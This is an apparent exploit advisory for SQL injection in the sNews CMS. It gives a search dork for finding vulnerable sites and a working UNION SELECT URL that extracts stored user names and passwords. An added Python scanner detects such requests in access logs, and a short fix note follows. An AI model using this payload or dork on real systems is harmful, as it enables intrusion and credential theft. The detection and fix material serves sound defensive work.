Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
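
A detection check built on the request above, added here as an example and not part of the original advisory: it scans access-log lines for `snews.php?act=shownews` requests whose `id` is not a plain integer and lists the SQL keywords found once `/**/` is treated as whitespace. The log lines are constructed, and the combined log format and the integer-only `id` rule are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); the second carries the example request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2013:10:00:01 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jan/2013:10:00:07 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,'
    'concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 5342',
    '203.0.113.7 - - [10/Jan/2013:10:01:12 +0000] "GET /snews/snews.php?act=shownews&id=12x HTTP/1.1" 200 480',
    '203.0.113.5 - - [10/Jan/2013:10:02:30 +0000] "GET /snews/index.php HTTP/1.1" 200 9001',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# /**/ stands in for whitespace in the request; the last alternative covers a trailing unterminated /*
COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
SQL_WORDS = re.compile(r"\b(union|select|concat|from|where|like)\b", re.I)

def classify(line):
    """Return None for unrelated requests, else (verdict, sql_words) for a shownews request."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes %20 etc.
    if not url.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
        return None
    ids = params.get("id", [""])
    if len(ids) == 1 and re.fullmatch(r"[0-9]+", ids[0]):
        return ("ok", [])  # assumption: legitimate article ids are plain integers
    flat = " ".join(COMMENT.sub(" ", v) for v in ids)
    words = sorted({w.lower() for w in SQL_WORDS.findall(flat)})
    return ("sqli", words) if words else ("non-numeric", [])

def scan(lines):
    """Return (line_number, verdict, sql_words) for every shownews request that is not 'ok'."""
    hits = []
    for n, line in enumerate(lines, 1):
        res = classify(line)
        if res and res[0] != "ok":
            hits.append((n, res[0], res[1]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the application-side fix: cast `id` to an integer (or bind it as a query parameter) before it reaches the SQL statement.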

Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*